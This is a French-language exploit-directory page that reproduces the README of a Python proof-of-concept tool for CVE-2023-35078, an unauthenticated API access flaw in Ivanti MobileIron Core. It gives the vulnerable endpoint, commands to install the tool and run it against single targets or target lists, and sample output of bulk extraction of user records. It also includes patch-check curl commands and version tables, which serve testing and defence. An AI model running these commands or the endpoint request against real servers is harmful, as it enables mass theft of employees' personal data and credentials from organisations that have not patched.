Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-35078 — CVE-2023-35078 - Outil d'exploitation d'accès API non authentifié à distance pour Ivanti MobileIron Core | Kitploit
Outils/GitHubGitHub/0nsec/cve-2023-35078
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHub0nsec/cve-2023-35078

CVE-2023-35078

CVE-2023-35078 - Outil d'exploitation d'accès API non authentifié à distance pour Ivanti MobileIron Core

Voir le dépôt
150il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Outil d'exploitation CVE-2023-35078

root@kitploit:~
██████╗ ███╗   ██╗███████╗███████╗ ██████╗
██╔═████╗████╗  ██║██╔════╝██╔════╝██╔════╝
██║██╔██║██╔██╗ ██║███████╗█████╗  ██║     
████╔╝██║██║╚██╗██║╚════██║██╔══╝  ██║     
╚██████╔╝██║ ╚████║███████║███████╗╚██████╗
 ╚═════╝ ╚═╝  ╚═══╝╚══════╝╚══════╝ ╚═════╝

[+] CVE-2023-35078 - Ivanti MobileIron Core Remote Unauthenticated API Access

Python Version License CVSS Last Updated

Un exploit de preuve de concept basé sur Python pour CVE-2023-35078, ciblant la vulnérabilité d'accès API non authentifié à distance dans les systèmes Ivanti MobileIron Core.

Aperçu de la vulnérabilité

CVE-2023-35078 est une vulnérabilité critique affectant Ivanti MobileIron Core qui permet à des attaquants distants non authentifiés d'accéder à des points de terminaison API sensibles et d'extraire des données utilisateur sans aucune authentification.

  • Score CVSS : 9.8 (Critique)
  • CWE : CWE-306 (Absence d'authentification pour une fonction critique)
  • Produits concernés : Ivanti MobileIron Core
  • Versions vulnérables :
    • 11.2 (antérieur à 11.2 CU21)
    • 11.3 (antérieur à 11.3 CU18)
    • 11.4 (antérieur à 11.4 CU8)
  • Vecteur d'attaque : Réseau
  • Authentification : Aucune requise
  • Interaction utilisateur : Aucune requise
  • Impact : Exposition complète des données utilisateur

Détails techniques

La vulnérabilité réside dans le mécanisme d'authentification de l'API de MobileIron Core, spécifiquement dans le point de terminaison /mifs/aad/api/v2/authorized/users. Ce point de terminaison ne valide pas correctement les jetons d'authentification, permettant un accès non autorisé à des informations sensibles des utilisateurs, notamment :

  • Identifiants utilisateur : Noms d'utilisateur, hachages de mots de passe
  • Données personnelles : Noms complets, adresses e-mail, numéros de téléphone
  • Données d'entreprise : Numéros d'employé, informations sur le service
  • Informations sur les appareils : Appareils inscrits, configurations des appareils
  • Données administratives : Rôles utilisateur, permissions, appartenance aux groupes

Installation

Prérequis

  • Python : 3.6 ou supérieur
  • Système d'exploitation : Linux, macOS, Windows
  • Accès réseau : Requis pour les tests sur cible
  • Permissions : Autorisation des propriétaires du système

Installation rapide

root@kitploit:~
# Clone the repository
git clone https://github.com/0nsec/cve-2023-35078-exploit.git
cd cve-2023-35078-exploit

# Install dependencies
pip3 install -r requirements.txt

# Make executable (Linux/macOS)
chmod +x cve_2023_35078.py

Installation manuelle

root@kitploit:~
# Create project directory
mkdir cve-2023-35078-exploit
cd cve-2023-35078-exploit

# Download the script
wget https://raw.githubusercontent.com/0nsec/cve-2023-35078-exploit/main/cve_2023_35078.py

# Install required packages
pip3 install requests urllib3 termcolor argparse

Installation Docker (Optionnelle)

root@kitploit:~
FROM python:3.9-slim

WORKDIR /app
COPY requirements.txt .
RUN pip install -r requirements.txt

COPY cve_2023_35078.py .
ENTRYPOINT ["python3", "cve_2023_35078.py"]
root@kitploit:~
# Build and run with Docker
docker build -t cve-2023-35078 .
docker run -v $(pwd)/results:/app/results cve-2023-35078 -u https://target.com

Utilisation

Utilisation de base

root@kitploit:~
# Test single target
python3 cve_2023_35078.py -u https://mobileiron.example.com

# Test multiple targets from file
python3 cve_2023_35078.py -f targets.txt

# Verbose mode with custom output directory
python3 cve_2023_35078.py -f targets.txt -o ./results -v

# Custom timeout and output settings
python3 cve_2023_35078.py -u https://target.com -t 30 -o ./scan_results -v

Exemples d'utilisation avancée

root@kitploit:~
# Comprehensive corporate assessment
python3 cve_2023_35078.py -f corporate_assets.txt -o ./audit_results -t 30 -v

# Single target with detailed logging
python3 cve_2023_35078.py -u https://mobileiron.target.com -v > detailed_log.txt

# Batch scanning with custom timeout
python3 cve_2023_35078.py -f subnet_scan.txt -t 5 -o ./batch_results

# Quick vulnerability check (no verbose output)
python3 cve_2023_35078.py -u https://quick.check.com -t 5

Sortie

root@kitploit:~
██████╗ ███╗   ██╗███████╗███████╗ ██████╗
██╔═████╗████╗  ██║██╔════╝██╔════╝██╔════╝
██║██╔██║██╔██╗ ██║███████╗█████╗  ██║     
████╔╝██║██║╚██╗██║╚════██║██╔══╝  ██║     
╚██████╔╝██║ ╚████║███████║███████╗╚██████╗
 ╚═════╝ ╚═╝  ╚═══╝╚══════╝╚══════╝ ╚═════╝

[*] Target: https://vulnerable.mobileiron.com
------------------------------------------------------------
[*] Checking version for: https://vulnerable.mobileiron.com
[*] Detected version: 11.3
[+] Target appears VULNERABLE!
[*] Attempting to exploit: https://vulnerable.mobileiron.com
[*] Trying endpoint: /mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1
[+] SUCCESS! Found 1,247 users
[+] Results saved to: ./results/vulnerable_mobileiron_com_20250821_055013.json
[+] Extracted 1247 user records
[*] Sample fields: ['id', 'username', 'email', 'firstName', 'lastName']...

============================================================
[*] Scan completed!
[*] Targets processed: 1
[*] Successful exploits: 1
[!] WARNING: 1 vulnerable system(s) found!
[!] Ensure proper authorization before testing!

Sortie verbeuse

root@kitploit:~
[*] Checking version for: https://test.mobileiron.com
[*] Trying endpoint: /mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1
[*] HTTP 200 - Response length: 45,123 bytes
[*] JSON parsing successful
[*] Found user data structure with 234 records
[+] SUCCESS! Found 234 users
[*] Sample user data: {'id': '12345', 'username': '[email protected]'}
[+] Results saved to: ./results/test_mobileiron_com_20250821_055013.json

Optimisations des performances

  • Pool de connexions : Réutilise les connexions HTTP
  • Requêtes concurrentes : Traitement parallèle pour plusieurs cibles
  • Délais d'attente intelligents : Délai d'attente adaptatif basé sur les temps de réponse
  • Gestion de la mémoire : Traitement efficace des grands ensembles de données
  • Limitation de débit : Délais intégrés pour éviter de submerger les cibles

Informations sur les correctifs du fournisseur

Vérification du correctif

root@kitploit:~
# Check current version
curl -k https://mobileiron-server/mifs/css/ui.login.css | grep -o "11\.[0-9]"

# Verify patched endpoints return 401/403
curl -k "https://mobileiron-server/mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1"

Références et ressources

Avis de sécurité officiels

  • NVD - CVE-2023-35078
  • Avis de sécurité Ivanti
  • Vulnérabilités connues exploitées par CISA

Documentation technique

  • Guide d'administration Ivanti MobileIron Core
  • Documentation de l'API
  • Guide de durcissement de la sécurité

Articles de recherche et analyses

  • Analyse technique détaillée
  • Techniques d'exploitation
  • Rapport de renseignement sur les menaces
Télécharger l’outil
VersionVulnérableCorrectif disponibleNiveau du correctifDate de publication
11.2.xOuiDisponibleCU21+2023-07-25
11.3.xOuiDisponibleCU18+2023-07-25
11.4.xOuiDisponibleCU8+2023-07-25
11.5.x+NonN/AN/AN/A